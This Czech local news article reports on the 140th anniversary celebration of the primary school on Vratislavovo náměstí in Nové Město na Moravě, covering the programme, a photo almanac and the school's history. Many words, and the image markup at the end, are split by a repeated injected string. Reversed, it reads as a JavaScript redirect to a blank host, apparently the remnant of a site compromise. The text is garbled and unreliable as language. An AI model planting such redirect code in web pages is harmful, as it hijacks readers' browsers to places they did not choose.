Rainbow page separator

Škola byla před 140 lety třetí českou měšťankou na Moravě

Pátek, 13. září 2019

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nejstarší novoměstská škola – základní škola na Vratislavově náměstí – bude slavit 140. výročí svého založení. Akce se uskuteční ve čtvrtek 19. září, zváni jsou všichni současní i bývalí žáci, zaměstnanci, rodiče i přátele školy. Oslavy proběhnou jak ve škole, tak i na náměstí, kde se až do večerních hodin bude odehrávat bohatý program.
Jeho návštěvníci se mohou těšit na křest knihy, koncerty, pěvecká i taneční vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení, výstavy, tvořivé dílny, programování robotů, soutěže s QR kódy, spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní klání či hudbu. Slavnost ve večerních hodinách navíc „rozsvítí“ profesionální ohňová shov se speciálními efekty.
Zajímavostí bude taktéž nový fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toalmanach obsahující na dvě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografií třídních kolektivů a učitelských sborů. Ukázky z něj současně budou v den oslav umístěny v přízemí budovy školy. Křest knihy je naplánován na 16.40 hodin na pódiu, přičemž při té příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti almanach bude i ke koupi.
Základní kameny novoměstské školy byly slavnostně položeny 16. července 1876, ve školním roce 1879-1880 byla otevřena první třída měšťanky. Škola se od začátku své existence stala centrem vzdělanosti nejen města, ale i okolních obcí. Šlo o teprve třetí českou měšťanskou školu na Moravě. V roce 1879 vzdělávací zařízení navštěvovalo 74 žáků, dnes jich je zhruba 540.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave.png“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to-na-morave.png“ alt=““ width=“540″ height=“797″>